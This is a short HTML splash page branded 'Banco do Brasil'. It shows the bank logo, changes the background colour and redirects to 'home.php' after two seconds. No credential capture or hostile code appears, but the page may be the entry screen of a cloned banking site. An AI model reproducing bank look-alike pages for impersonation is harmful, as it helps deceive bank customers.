<!DOCTYPE html>
<html>
<head>
	<title>Banco do Brasil</title>
	<meta charset="UTF-8">
	<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" />
	<link href='https://fonts.googleapis.com/css?family=Roboto' rel='stylesheet'>
	<link rel="stylesheet" type="text/css" href="reset.css" />
	<script src="https://code.jquery.com/jquery-2.2.4.min.js"></script>
	<link rel="stylesheet" type="text/css" href="style.css?id=001" />
	<style type="text/css">
		body{
			background-color: #ffed02;
			//ffed02				
			//005aa5
		}

		.mid{
			width: 221px;
			margin: 0 auto;
		}
		
		img {
		  vertical-align: middle;
		}		
	</style>
</head>
<body>
	<div class="mid">
		<img src="img/home_logo_bb.png">
	</div>

	<script type="text/javascript">
		$(document).ready(function(){
			setTimeout(function(){
				$("body").css("background-color", "#005aa5");
			}, 1000);

			setTimeout(function(){
				window.location.replace("home.php");
			}, 2000);
		});
	</script>

</body>
</html>